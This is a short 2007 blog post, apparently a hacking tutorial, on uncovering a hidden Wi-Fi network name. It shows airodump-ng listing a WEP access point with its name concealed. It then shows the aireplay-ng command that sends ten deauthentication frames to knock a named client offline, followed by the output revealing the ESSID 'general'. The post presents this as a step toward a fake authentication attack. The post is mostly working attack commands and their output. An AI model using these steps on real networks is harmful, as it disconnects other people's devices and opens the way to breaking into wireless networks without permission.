Monday, November 26, 2007

Deauthing users to get the ESSID using aircrack-ng


Sometimes airodump-ng wont show you the ESSID of an access point. you'll need the ESSID so you can do the fake authentication attack.

root@segfault:/home/cg/eric-g# airodump-ng ath0 --bssid 00:14:BF:9D:BA:DA -c 11
CH 11 ][ Elapsed: 9 s ][ 2007-11-25 23:43

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:BF:9D:BA:DA 13 37 98 15 2 11 48 WEP WEP (length: 7)

BSSID STATION PWR Lost Packets Probes

00:14:BF:9D:BA:DA 00:11:95:BD:77:79 -1 0 1
00:14:BF:9D:BA:DA 00:17:3F:74:80:D6 6 11 7


the solution to that is to deauth a client on the network, when they re-authenticate the ESSID should present itself.


root@segfault:/home/cg/casa# aireplay-ng -0 10 -a 00:14:BF:9D:BA:DA -c 00:17:3F:74:80:D6 ath0
23:45:50 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]
23:45:51 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]
23:45:52 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]
23:45:53 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]
23:45:55 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]
23:45:56 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]
23:45:57 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]
23:45:58 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]
23:45:59 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]
23:46:01 Sending DeAuth to station -- STMAC: [00:17:3F:74:80:D6]



watch your airodump output and the ESSID should change from length:# to the actual ESSID

CH 11 ][ Elapsed: 1 min ][ 2007-11-25 23:46

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:BF:9D:BA:DA 12 83 1093 122 5 11 48 WEP WEP OPN general

BSSID STATION PWR Lost Packets Probes

00:14:BF:9D:BA:DA 00:17:3F:74:80:D6 5 0 651
00:14:BF:9D:BA:DA 00:11:95:BD:77:79 -1 0 2

our ESSID is "general"

-CG


CG

No comments: